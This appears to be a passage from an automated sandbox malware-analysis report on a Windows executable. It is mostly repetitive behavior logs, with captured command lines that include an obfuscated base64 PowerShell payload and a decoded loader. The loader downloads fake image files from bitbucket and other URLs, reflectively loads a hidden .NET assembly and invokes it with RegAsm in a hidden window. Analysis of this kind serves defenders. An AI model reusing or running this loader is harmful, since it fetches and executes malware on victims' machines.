        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1802
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1579
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5102
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4558
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Check user administrative privileges: GetTokenInformation, graph_0-2596
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5696 Thread sleep count: 5102 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488 Thread sleep count: 4558 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4368 Thread sleep time: -12912720851596678s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F2034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7E74F2034
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F6710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7E74F6710
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000007.00000002.2201447313.00000218C3390000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F3214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7E74F3214
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F8A1E SetUnhandledExceptionFilter,0_2_00007FF7E74F8A1E
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F8714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7E74F8714

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match File source: amsi64_6568.amsi.csv, type: OTHER
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs"
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zgbn@gg@z@@v@gy@zwbk@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@c4@agbw@gc@pw@x@dm@nw@x@de@mw@n@cw@i@@n@gg@d@@z@du@lwbu@ge@bgbv@c8@cgbl@gy@cw@v@gg@zqbh@gq@cw@v@g0@yqbp@g4@lwbu@gu@dwbf@gk@bqbn@de@mg@z@c4@agbw@gc@jw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@pq@g@eq@bwb3@g4@b@bv@ge@z@be@ge@d@bh@ey@cgbv@g0@t@bp@g4@awbz@c@@j@bs@gk@bgbr@hm@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@c0@bgbl@c@@j@bu@hu@b@bs@ck@i@b7@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@g@d0@i@bb@fm@eqbz@hq@zqbt@c4@v@bl@hg@d@@u@eu@bgbj@g8@z@bp@g4@zwbd@do@ogbv@fq@rg@4@c4@rwbl@hq@uwb0@hi@aqbu@gc@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbt@fq@qqbs@fq@pg@+@cc@ow@g@cq@zqbu@gq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@eu@tgbe@d4@pg@n@ds@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@hm@d@bh@hi@d@bg@gw@yqbn@ck@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@zqbu@gq@rgbs@ge@zw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@t@gc@zq@g@d@@i@@t@ge@bgbk@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@gc@d@@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@p@c@@ew@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@cs@pq@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@lgbm@gu@bgbn@hq@a@@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@ygbh@hm@zq@2@dq@t@bl@g4@zwb0@gg@i@@9@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@d
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.ihbddii/selif/gro.makuresadsehteb//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F1258 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF7E74F1258
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
